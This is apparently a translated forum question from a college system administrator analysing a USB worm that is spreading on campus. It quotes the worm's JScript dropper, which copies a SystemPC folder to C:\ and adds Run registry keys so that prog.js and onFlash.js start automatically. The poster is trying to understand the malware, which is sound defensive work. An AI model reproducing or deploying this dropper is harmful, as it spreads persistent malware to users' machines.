Мобильная версияКод: Выделить всё
var FSO = WScript.CreateObject("Scripting.FIleSystemObject"); var WshShell = WScript.CreateObject("Wscript.Shell"); var pt1 = FSO.GetDriveName(WshShell.CurrentDirectory); //flash drive name //open the window with documents and copy the virus to c:\. WshShell.Run(pt1+"\Document"); FSO.CopyFolder(pt1+"\Document\SystemPC", "C:\"); //write to the registry WshShell.RegWrite("HKEY_CURRENT_USER\Software\Microsoft\\Windows\CurrentVersion\\\Run\prog", "C:\\SystemPC\prog.js", "REG_SZ"); WshShell.RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\onFlash", "C:\SystemPC\onFlash.js", "REG_SZ"); //run programs WshShell.Run("C:C:\\SystemPC\\onFlash.js"); WshShell.Run("C:\\SystemPC\prog.js"). Но ничего не случилось с ПК, лол. Я только что напечатал атриб -h -r -s /s /d g:* в cmd, и папка документов появилась с моими файлами и папкой SystemPC. В SystemPC есть вирусные файлы onflash.js, onpc.js, prog.js, unp40590149.tmp, virus.js. И это последний файл, который не читается. (Это двоичный) < /p>
Различные кодирования в блокноте ++ не помогли. Это то, что HXD показывает на фото: (https://i.sstatic.net/kzprbevb.jpg) Мне интересно увидеть исходный код, потому что этот вирус распространяется через колледж, и для меня важно понять, что он делает Поскольку я являюсь системным администратором и отвечаю за компьютеры: (< /p>
Я попытался открыть его с помощью блокнота ++ и различных кодировки в нем; я открыл его с HXD. Вы не можете открыть его с 7zip
Подробнее здесь: https://stackoverflow.com/questions/794 ... le-not-zip
